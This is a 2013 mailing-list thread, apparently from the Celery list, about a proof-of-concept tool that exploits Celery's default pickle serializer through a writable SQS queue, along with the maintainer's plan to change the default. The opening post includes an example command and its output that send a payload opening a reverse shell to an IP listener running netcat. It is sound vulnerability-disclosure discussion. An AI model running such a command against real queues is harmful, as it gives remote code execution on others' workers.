Andres Riancho | 6 Sep 14:08 2013
Picon

Celery python pickle exploit

List,

    Celery's documentation clearly states that using pickle for
serializing the information you send to the broker can be insecure and
gives safe alternatives. The main issue for me is that Celery's
default serializer is pickle, so I wrote a PoC tool that will exploit
this vulnerability [0][1].

    For this exploit to work celery needs to use SQS and the intruder
needs to have write access to the queue. Example run:

$ nimbostratus celery-pickle-exploit --access-key=... \
                  --secret-key=... --reverse 1.2.3.4:4000 \
                  --queue-name nimbostratus-celery --region ap-southeast-1
Starting celery-exploit
SQS queue nimbostratus-celery is vulnerable
We can write to the SQS queue.
Start a netcat to listen for connections at 1.2.3.4:4000 and press enter.

Sent payload to SQS, wait for the reverse connection!

    The most interesting part is the implementation which can be found here [1].

    I have no intentions to damage the Celery project, this is just a
PoC and as mentioned before this is a well documented vulnerability
with good and working fixes (different serializer, SSL signing of
messages).

[0] http://andresriancho.github.io/nimbostratus/
[1] https://github.com/andresriancho/nimbostratus/blob/master/core/celery_exploit/command.py
(Continue reading)

Ask Solem | 6 Sep 15:11 2013

Re: Celery python pickle exploit


On Sep 6, 2013, at 1:08 PM, Andres Riancho <andres.riancho@...> wrote:

> List,
> 
>    Celery's documentation clearly states that using pickle for
> serializing the information you send to the broker can be insecure and
> gives safe alternatives. The main issue for me is that Celery's
> default serializer is pickle, so I wrote a PoC tool that will exploit
> this vulnerability [0][1].

Andreas,

Thank you for this PoC, it's important to know that this can be a serious
issue if an attacker is able to send messages to the worker.

There isn't really anything we can do to fix this as this is how
pickle works for any project using it.

I have already decided that pickle will no longer be the default
serializer from Celery 3.2 (or 3.1 if the list feels that is ok, see below)
This means that users will need to educate themselves before enabling it.

The groundworks for that change is already complete:

- Kombu 3.0 no longer accepts pickle by default, instead you have
  to explicitly specify that you accept it using the accept argument to
  kombu.Consumer:

      consumer = kombu.Consumer(connection, accept=['pickle', 'json'])
(Continue reading)

Andres Riancho | 6 Sep 15:37 2013
Picon

Re: Celery python pickle exploit

Ask,

On Fri, Sep 6, 2013 at 10:11 AM, Ask Solem <ask@...> wrote:
>
> On Sep 6, 2013, at 1:08 PM, Andres Riancho
<andres.riancho@...> wrote:
>
>> List,
>>
>>    Celery's documentation clearly states that using pickle for
>> serializing the information you send to the broker can be insecure and
>> gives safe alternatives. The main issue for me is that Celery's
>> default serializer is pickle, so I wrote a PoC tool that will exploit
>> this vulnerability [0][1].
>
>
> Andreas,
>
> Thank you for this PoC, it's important to know that this can be a serious
> issue if an attacker is able to send messages to the worker.
>
> There isn't really anything we can do to fix this as this is how
> pickle works for any project using it.

Agreed,

> I have already decided that pickle will no longer be the default
> serializer from Celery 3.2 (or 3.1 if the list feels that is ok, see below)
> This means that users will need to educate themselves before enabling it.

(Continue reading)


Gmane